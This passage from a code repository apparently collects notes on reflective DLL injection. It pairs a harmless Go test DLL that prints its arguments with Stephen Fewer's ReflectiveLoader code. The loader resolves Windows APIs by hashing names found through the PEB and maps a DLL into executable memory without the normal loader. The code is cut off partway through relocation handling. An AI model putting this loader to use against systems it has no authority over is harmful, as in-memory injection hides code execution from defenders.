34 |     return TRUE; // Successful.
35 | }


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/dllmain.def:
--------------------------------------------------------------------------------
1 | EXPORTS
2 |     test
3 |     ReflectiveLoader


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/dllmain.go:
--------------------------------------------------------------------------------
1 | package main
2 | 
3 | //#include "dllmain.h"
4 | //#include "ReflectiveDll.h"
5 | import "C"
6 | 


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/dllmain.h:
--------------------------------------------------------------------------------
 1 | /* Code generated by cmd/cgo; DO NOT EDIT. */
 2 | 
 3 | /* package _/C_/Users/HP/Desktop/go-ReflectiveDLL-master */
 4 | 
 5 | 
 6 | #line 1 "cgo-builtin-export-prolog"
 7 | 
 8 | #include <stddef.h> /* for ptrdiff_t below */
 9 | 
10 | #ifndef GO_CGO_EXPORT_PROLOGUE_H
11 | #define GO_CGO_EXPORT_PROLOGUE_H
12 | 
13 | #ifndef GO_CGO_GOSTRING_TYPEDEF
14 | typedef struct { const char *p; ptrdiff_t n; } _GoString_;
15 | #endif
16 | 
17 | #endif
18 | 
19 | /* Start of preamble from import "C" comments.  */
20 | 
21 | 
22 | 
23 | 
24 | /* End of preamble from import "C" comments.  */
25 | 
26 | 
27 | /* Start of boilerplate cgo prologue.  */
28 | #line 1 "cgo-gcc-export-header-prolog"
29 | 
30 | #ifndef GO_CGO_PROLOGUE_H
31 | #define GO_CGO_PROLOGUE_H
32 | 
33 | typedef signed char GoInt8;
34 | typedef unsigned char GoUint8;
35 | typedef short GoInt16;
36 | typedef unsigned short GoUint16;
37 | typedef int GoInt32;
38 | typedef unsigned int GoUint32;
39 | typedef long long GoInt64;
40 | typedef unsigned long long GoUint64;
41 | typedef GoInt64 GoInt;
42 | typedef GoUint64 GoUint;
43 | typedef __SIZE_TYPE__ GoUintptr;
44 | typedef float GoFloat32;
45 | typedef double GoFloat64;
46 | typedef float _Complex GoComplex64;
47 | typedef double _Complex GoComplex128;
48 | 
49 | /*
50 |   static assertion to make sure the file is being used on architecture
51 |   at least with matching size of GoInt.
52 | */
53 | typedef char _check_for_64_bit_pointer_matching_GoInt[sizeof(void*)==64/8 ? 1:-1];
54 | 
55 | #ifndef GO_CGO_GOSTRING_TYPEDEF
56 | typedef _GoString_ GoString;
57 | #endif
58 | typedef void *GoMap;
59 | typedef void *GoChan;
60 | typedef struct { void *t; void *v; } GoInterface;
61 | typedef struct { void *data; GoInt len; GoInt cap; } GoSlice;
62 | 
63 | #endif
64 | 
65 | /* End of boilerplate cgo prologue.  */
66 | 
67 | #ifdef __cplusplus
68 | extern "C" {
69 | #endif
70 | 
71 | 
72 | extern void test(GoString p0);
73 | 
74 | #ifdef __cplusplus
75 | }
76 | #endif
77 | 


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/go-ReflectiveDLL-master.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/go-ReflectiveDLL-master/go-ReflectiveDLL-master.zip


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/main.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | import "C"
 4 | 
 5 | import (
 6 | 	"fmt"
 7 | 	"os"
 8 | 	gsq "github.com/kballard/go-shellquote"
 9 | )
10 | 
11 | 
12 | 
13 | //export test
14 | func test(arg string) {
15 | 
16 | 	args, err := gsq.Split(arg)
17 | 	if err == nil {
18 | 		fmt.Println("Golang ReflectiveDLL")
19 | 		os.Args = args
20 | 		fmt.Printf("Args Count %d\n",len(os.Args))
21 | 		for i := 0; i < len(os.Args); i++ {
22 | 			fmt.Printf("[%d] %s\n",i,os.Args[i])
23 | 		}
24 | 	}
25 | }
26 | 
27 | func main()  {
28 | 
29 | }
30 | 


--------------------------------------------------------------------------------
/go-ReflectiveDLL-master/x32/ReflectiveDll.h:
--------------------------------------------------------------------------------
  1 | //===============================================================================================//
  2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
  3 | // All rights reserved.
  4 | //
  5 | // Redistribution and use in source and binary forms, with or without modification, are permitted
  6 | // provided that the following conditions are met:
  7 | //
  8 | //     * Redistributions of source code must retain the above copyright notice, this list of
  9 | // conditions and the following disclaimer.
 10 | //
 11 | //     * Redistributions in binary form must reproduce the above copyright notice, this list of
 12 | // conditions and the following disclaimer in the documentation and/or other materials provided
 13 | // with the distribution.
 14 | //
 15 | //     * Neither the name of Harmony Security nor the names of its contributors may be used to
 16 | // endorse or promote products derived from this software without specific prior written permission.
 17 | //
 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
 26 | // POSSIBILITY OF SUCH DAMAGE.
 27 | //===============================================================================================//
 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
 30 | //===============================================================================================//
 31 | #define WIN32_LEAN_AND_MEAN
 32 | #define MINGW_FORCE_SYS_INTRINS
 33 | 
 34 | #include <windows.h>
 35 | #include <Winsock2.h>
 36 | #include <intrin.h>
 37 | 
 38 | 
 39 | #define DLL_QUERY_HMODULE		6
 40 | 
 41 | #define DEREF( name )*(UINT_PTR *)(name)
 42 | #define DEREF_64( name )*(DWORD64 *)(name)
 43 | #define DEREF_32( name )*(DWORD *)(name)
 44 | #define DEREF_16( name )*(WORD *)(name)
 45 | #define DEREF_8( name )*(BYTE *)(name)
 46 | 
 47 | typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID );
 48 | typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
 49 | 
 50 | #define DLLEXPORT   __declspec( dllexport )
 51 | 
 52 | typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
 53 | typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
 54 | typedef LPVOID  (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
 55 | typedef DWORD  (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
 56 | 
 57 | #define KERNEL32DLL_HASH				0x6A4ABC5B
 58 | #define NTDLLDLL_HASH					0x3CFA685D
 59 | 
 60 | #define LOADLIBRARYA_HASH				0xEC0E4E8E
 61 | #define GETPROCADDRESS_HASH				0x7C0DFCAA
 62 | #define VIRTUALALLOC_HASH				0x91AFCA54
 63 | #define NTFLUSHINSTRUCTIONCACHE_HASH	0x534C0AB8
 64 | 
 65 | #define IMAGE_REL_BASED_ARM_MOV32A		5
 66 | #define IMAGE_REL_BASED_ARM_MOV32T		7
 67 | 
 68 | #define ARM_MOV_MASK					(DWORD)(0xFBF08000)
 69 | #define ARM_MOV_MASK2					(DWORD)(0xFBF08F00)
 70 | #define ARM_MOVW						0xF2400000
 71 | #define ARM_MOVT						0xF2C00000
 72 | 
 73 | #define HASH_KEY						13
 74 | //===============================================================================================//
 75 | #pragma intrinsic( _rotr )
 76 | 
 77 | __forceinline DWORD ror( DWORD d )
 78 | {
 79 | 	return _rotr( d, HASH_KEY );
 80 | }
 81 | 
 82 | __forceinline DWORD hash( char * c )
 83 | {
 84 |     register DWORD h = 0;
 85 | 	do
 86 | 	{
 87 | 		h = ror( h );
 88 |         h += *c;
 89 | 	} while( *++c );
 90 | 
 91 |     return h;
 92 | }
 93 | //===============================================================================================//
 94 | typedef struct _UNICODE_STR
 95 | {
 96 |   USHORT Length;
 97 |   USHORT MaximumLength;
 98 |   PWSTR pBuffer;
 99 | } UNICODE_STR, *PUNICODE_STR;
100 | 
101 | // WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
102 | //__declspec( align(8) )
103 | typedef struct _LDR_DATA_TABLE_ENTRY
104 | {
105 | 	//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
106 | 	LIST_ENTRY InMemoryOrderModuleList;
107 | 	LIST_ENTRY InInitializationOrderModuleList;
108 | 	PVOID DllBase;
109 | 	PVOID EntryPoint;
110 | 	ULONG SizeOfImage;
111 | 	UNICODE_STR FullDllName;
112 | 	UNICODE_STR BaseDllName;
113 | 	ULONG Flags;
114 | 	SHORT LoadCount;
115 | 	SHORT TlsIndex;
116 | 	LIST_ENTRY HashTableEntry;
117 | 	ULONG TimeDateStamp;
118 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
119 | 
120 | // WinDbg> dt -v ntdll!_PEB_LDR_DATA
121 | typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
122 | {
123 |    DWORD dwLength;
124 |    DWORD dwInitialized;
125 |    LPVOID lpSsHandle;
126 |    LIST_ENTRY InLoadOrderModuleList;
127 |    LIST_ENTRY InMemoryOrderModuleList;
128 |    LIST_ENTRY InInitializationOrderModuleList;
129 |    LPVOID lpEntryInProgress;
130 | } PEB_LDR_DATA, * PPEB_LDR_DATA;
131 | 
132 | // WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
133 | typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
134 | {
135 |    struct _PEB_FREE_BLOCK * pNext;
136 |    DWORD dwSize;
137 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
138 | 
139 | // struct _PEB is defined in Winternl.h but it is incomplete
140 | // WinDbg> dt -v ntdll!_PEB
141 | typedef struct __PEB // 65 elements, 0x210 bytes
142 | {
143 |    BYTE bInheritedAddressSpace;
144 |    BYTE bReadImageFileExecOptions;
145 |    BYTE bBeingDebugged;
146 |    BYTE bSpareBool;
147 |    LPVOID lpMutant;
148 |    LPVOID lpImageBaseAddress;
149 |    PPEB_LDR_DATA pLdr;
150 |    LPVOID lpProcessParameters;
151 |    LPVOID lpSubSystemData;
152 |    LPVOID lpProcessHeap;
153 |    PRTL_CRITICAL_SECTION pFastPebLock;
154 |    LPVOID lpFastPebLockRoutine;
155 |    LPVOID lpFastPebUnlockRoutine;
156 |    DWORD dwEnvironmentUpdateCount;
157 |    LPVOID lpKernelCallbackTable;
158 |    DWORD dwSystemReserved;
159 |    DWORD dwAtlThunkSListPtr32;
160 |    PPEB_FREE_BLOCK pFreeList;
161 |    DWORD dwTlsExpansionCounter;
162 |    LPVOID lpTlsBitmap;
163 |    DWORD dwTlsBitmapBits[2];
164 |    LPVOID lpReadOnlySharedMemoryBase;
165 |    LPVOID lpReadOnlySharedMemoryHeap;
166 |    LPVOID lpReadOnlyStaticServerData;
167 |    LPVOID lpAnsiCodePageData;
168 |    LPVOID lpOemCodePageData;
169 |    LPVOID lpUnicodeCaseTableData;
170 |    DWORD dwNumberOfProcessors;
171 |    DWORD dwNtGlobalFlag;
172 |    LARGE_INTEGER liCriticalSectionTimeout;
173 |    DWORD dwHeapSegmentReserve;
174 |    DWORD dwHeapSegmentCommit;
175 |    DWORD dwHeapDeCommitTotalFreeThreshold;
176 |    DWORD dwHeapDeCommitFreeBlockThreshold;
177 |    DWORD dwNumberOfHeaps;
178 |    DWORD dwMaximumNumberOfHeaps;
179 |    LPVOID lpProcessHeaps;
180 |    LPVOID lpGdiSharedHandleTable;
181 |    LPVOID lpProcessStarterHelper;
182 |    DWORD dwGdiDCAttributeList;
183 |    LPVOID lpLoaderLock;
184 |    DWORD dwOSMajorVersion;
185 |    DWORD dwOSMinorVersion;
186 |    WORD wOSBuildNumber;
187 |    WORD wOSCSDVersion;
188 |    DWORD dwOSPlatformId;
189 |    DWORD dwImageSubsystem;
190 |    DWORD dwImageSubsystemMajorVersion;
191 |    DWORD dwImageSubsystemMinorVersion;
192 |    DWORD dwImageProcessAffinityMask;
193 |    DWORD dwGdiHandleBuffer[34];
194 |    LPVOID lpPostProcessInitRoutine;
195 |    LPVOID lpTlsExpansionBitmap;
196 |    DWORD dwTlsExpansionBitmapBits[32];
197 |    DWORD dwSessionId;
198 |    ULARGE_INTEGER liAppCompatFlags;
199 |    ULARGE_INTEGER liAppCompatFlagsUser;
200 |    LPVOID lppShimData;
201 |    LPVOID lpAppCompatInfo;
202 |    UNICODE_STR usCSDVersion;
203 |    LPVOID lpActivationContextData;
204 |    LPVOID lpProcessAssemblyStorageMap;
205 |    LPVOID lpSystemDefaultActivationContextData;
206 |    LPVOID lpSystemAssemblyStorageMap;
207 |    DWORD dwMinimumStackCommit;
208 | } _PEB, * _PPEB;
209 | 
210 | typedef struct
211 | {
212 | 	WORD	offset:12;
213 | 	WORD	type:4;
214 | } IMAGE_RELOC, *PIMAGE_RELOC;
215 | 
216 | // Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
217 | HINSTANCE hAppInstance = NULL;
218 | //===============================================================================================//
219 | #pragma intrinsic( _ReturnAddress )
220 | // This function can not be inlined by the compiler or we will not get the address we expect. Ideally
221 | // this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of
222 | // RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics
223 | // available (and no inline asm available under x64).
224 | __declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)__builtin_return_address(0); }
225 | //===============================================================================================//
226 | 
227 | // Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
228 | //         otherwise the DllMain at the end of this file will be used.
229 | 
230 | // Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
231 | //         otherwise it is assumed you are calling the ReflectiveLoader via a stub.
232 | 
233 | // This is our position independent reflective DLL loader/injector
234 | 
235 | ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
236 | {
237 | 	// the functions we need
238 | 	LOADLIBRARYA pLoadLibraryA     = NULL;
239 | 	GETPROCADDRESS pGetProcAddress = NULL;
240 | 	VIRTUALALLOC pVirtualAlloc     = NULL;
241 | 	NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
242 | 
243 | 	USHORT usCounter;
244 | 
245 | 	// the initial location of this image in memory
246 | 	ULONG_PTR uiLibraryAddress;
247 | 	// the kernels base address and later this images newly loaded base address
248 | 	ULONG_PTR uiBaseAddress;
249 | 
250 | 	// variables for processing the kernels export table
251 | 	ULONG_PTR uiAddressArray;
252 | 	ULONG_PTR uiNameArray;
253 | 	ULONG_PTR uiExportDir;
254 | 	ULONG_PTR uiNameOrdinals;
255 | 	DWORD dwHashValue;
256 | 
257 | 	// variables for loading this image
258 | 	ULONG_PTR uiHeaderValue;
259 | 	ULONG_PTR uiValueA;
260 | 	ULONG_PTR uiValueB;
261 | 	ULONG_PTR uiValueC;
262 | 	ULONG_PTR uiValueD;
263 | 	ULONG_PTR uiValueE;
264 | 
265 | 	// STEP 0: calculate our images current base address
266 | 
267 | 	// we will start searching backwards from our callers return address.
268 | 	uiLibraryAddress = caller();
269 | 
270 | 	// loop through memory backwards searching for our images base address
271 | 	// we dont need SEH style search as we shouldnt generate any access violations with this
272 | 	while( TRUE )
273 | 	{
274 | 		if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
275 | 		{
276 | 			uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
277 | 			// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
278 | 			// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
279 | 			if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
280 | 			{
281 | 				uiHeaderValue += uiLibraryAddress;
282 | 				// break if we have found a valid MZ/PE header
283 | 				if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
284 | 					break;
285 | 			}
286 | 		}
287 | 		uiLibraryAddress--;
288 | 	}
289 | 
290 | 	// STEP 1: process the kernels exports for the functions our loader needs...
291 | 
292 | 	// get the Process Enviroment Block
293 | 
294 | 	//uiBaseAddress = __readgsqword( 0x60 );
295 |     uiBaseAddress = __readfsdword( 0x30 );
296 | 
297 | 	// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
298 | 	uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
299 | 
300 | 	// get the first entry of the InMemoryOrder module list
301 | 	uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
302 | 	while( uiValueA )
303 | 	{
304 | 		// get pointer to current modules name (unicode string)
305 | 		uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
306 | 		// set bCounter to the length for the loop
307 | 		usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
308 | 		// clear uiValueC which will store the hash of the module name
309 | 		uiValueC = 0;
310 | 
311 | 		// compute the hash of the module name...
312 | 		do
313 | 		{
314 | 			uiValueC = ror( (DWORD)uiValueC );
315 | 			// normalize to uppercase if the madule name is in lowercase
316 | 			if( *((BYTE *)uiValueB) >= 'a' )
317 | 				uiValueC += *((BYTE *)uiValueB) - 0x20;
318 | 			else
319 | 				uiValueC += *((BYTE *)uiValueB);
320 | 			uiValueB++;
321 | 		} while( --usCounter );
322 | 
323 | 		// compare the hash with that of kernel32.dll
324 | 		if( (DWORD)uiValueC == KERNEL32DLL_HASH )
325 | 		{
326 | 			// get this modules base address
327 | 			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
328 | 
329 | 			// get the VA of the modules NT Header
330 | 			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
331 | 
332 | 			// uiNameArray = the address of the modules export directory entry
333 | 			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
334 | 
335 | 			// get the VA of the export directory
336 | 			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
337 | 
338 | 			// get the VA for the array of name pointers
339 | 			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
340 | 
341 | 			// get the VA for the array of name ordinals
342 | 			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
343 | 
344 | 			usCounter = 3;
345 | 
346 | 			// loop while we still have imports to find
347 | 			while( usCounter > 0 )
348 | 			{
349 | 				// compute the hash values for this function name
350 | 				dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
351 | 
352 | 				// if we have found a function we want we get its virtual address
353 | 				if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
354 | 				{
355 | 					// get the VA for the array of addresses
356 | 					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
357 | 
358 | 					// use this functions name ordinal as an index into the array of name pointers
359 | 					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
360 | 
361 | 					// store this functions VA
362 | 					if( dwHashValue == LOADLIBRARYA_HASH )
363 | 						pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
364 | 					else if( dwHashValue == GETPROCADDRESS_HASH )
365 | 						pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
366 | 					else if( dwHashValue == VIRTUALALLOC_HASH )
367 | 						pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
368 | 
369 | 					// decrement our counter
370 | 					usCounter--;
371 | 				}
372 | 
373 | 				// get the next exported function name
374 | 				uiNameArray += sizeof(DWORD);
375 | 
376 | 				// get the next exported function name ordinal
377 | 				uiNameOrdinals += sizeof(WORD);
378 | 			}
379 | 		}
380 | 		else if( (DWORD)uiValueC == NTDLLDLL_HASH )
381 | 		{
382 | 			// get this modules base address
383 | 			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
384 | 
385 | 			// get the VA of the modules NT Header
386 | 			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
387 | 
388 | 			// uiNameArray = the address of the modules export directory entry
389 | 			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
390 | 
391 | 			// get the VA of the export directory
392 | 			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
393 | 
394 | 			// get the VA for the array of name pointers
395 | 			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
396 | 
397 | 			// get the VA for the array of name ordinals
398 | 			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
399 | 
400 | 			usCounter = 1;
401 | 
402 | 			// loop while we still have imports to find
403 | 			while( usCounter > 0 )
404 | 			{
405 | 				// compute the hash values for this function name
406 | 				dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
407 | 
408 | 				// if we have found a function we want we get its virtual address
409 | 				if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
410 | 				{
411 | 					// get the VA for the array of addresses
412 | 					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
413 | 
414 | 					// use this functions name ordinal as an index into the array of name pointers
415 | 					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
416 | 
417 | 					// store this functions VA
418 | 					if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
419 | 						pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) );
420 | 
421 | 					// decrement our counter
422 | 					usCounter--;
423 | 				}
424 | 
425 | 				// get the next exported function name
426 | 				uiNameArray += sizeof(DWORD);
427 | 
428 | 				// get the next exported function name ordinal
429 | 				uiNameOrdinals += sizeof(WORD);
430 | 			}
431 | 		}
432 | 
433 | 		// we stop searching when we have found everything we need.
434 | 		if( pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache )
435 | 			break;
436 | 
437 | 		// get the next entry
438 | 		uiValueA = DEREF( uiValueA );
439 | 	}
440 | 
441 | 	// STEP 2: load our image into a new permanent location in memory...
442 | 
443 | 	// get the VA of the NT Header for the PE to be loaded
444 | 	uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
445 | 
446 | 	// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
447 | 	// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
448 | 	uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
449 | 
450 | 	// we must now copy over the headers
451 | 	uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
452 | 	uiValueB = uiLibraryAddress;
453 | 	uiValueC = uiBaseAddress;
454 | 
455 | 	while( uiValueA-- )
456 | 		*(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
457 | 
458 | 	// STEP 3: load in all of our sections...
459 | 
460 | 	// uiValueA = the VA of the first section
461 | 	uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
462 | 
463 | 	// itterate through all sections, loading them into memory.
464 | 	uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
465 | 	while( uiValueE-- )
466 | 	{
467 | 		// uiValueB is the VA for this section
468 | 		uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
469 | 
470 | 		// uiValueC if the VA for this sections data
471 | 		uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
472 | 
473 | 		// copy the section over
474 | 		uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
475 | 
476 | 		while( uiValueD-- )
477 | 			*(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
478 | 
479 | 		// get the VA of the next section
480 | 		uiValueA += sizeof( IMAGE_SECTION_HEADER );
481 | 	}
482 | 
483 | 	// STEP 4: process our images import table...
484 | 
485 | 	// uiValueB = the address of the import directory
486 | 	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
487 | 
488 | 	// we assume their is an import table to process
489 | 	// uiValueC is the first entry in the import table
490 | 	uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
491 | 
492 | 	// itterate through all imports
493 | 	while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
494 | 	{
495 | 		// use LoadLibraryA to load the imported module into memory
496 | 		uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
497 | 
498 | 		// uiValueD = VA of the OriginalFirstThunk
499 | 		uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
500 | 
501 | 		// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
502 | 		uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
503 | 
504 | 		// itterate through all imported functions, importing by ordinal if no name present
505 | 		while( DEREF(uiValueA) )
506 | 		{
507 | 			// sanity check uiValueD as some compilers only import by FirstThunk
508 | 			if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
509 | 			{
510 | 				// get the VA of the modules NT Header
511 | 				uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
512 | 
513 | 				// uiNameArray = the address of the modules export directory entry
514 | 				uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
515 | 
516 | 				// get the VA of the export directory
517 | 				uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
518 | 
519 | 				// get the VA for the array of addresses
520 | 				uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
521 | 
522 | 				// use the import ordinal (- export ordinal base) as an index into the array of addresses
523 | 				uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
524 | 
525 | 				// patch in the address for this imported function
526 | 				DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
527 | 			}
528 | 			else
529 | 			{
530 | 				// get the VA of this functions import by name struct
531 | 				uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
532 | 
533 | 				// use GetProcAddress and patch in the address for this imported function
534 | 				DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
535 | 			}
536 | 			// get the next imported function
537 | 			uiValueA += sizeof( ULONG_PTR );
538 | 			if( uiValueD )
539 | 				uiValueD += sizeof( ULONG_PTR );
540 | 		}
541 | 
542 | 		// get the next import
543 | 		uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
544 | 	}
545 | 
546 | 	// STEP 5: process all of our images relocations...
547 | 
548 | 	// calculate the base address delta and perform relocations (even if we load at desired image base)
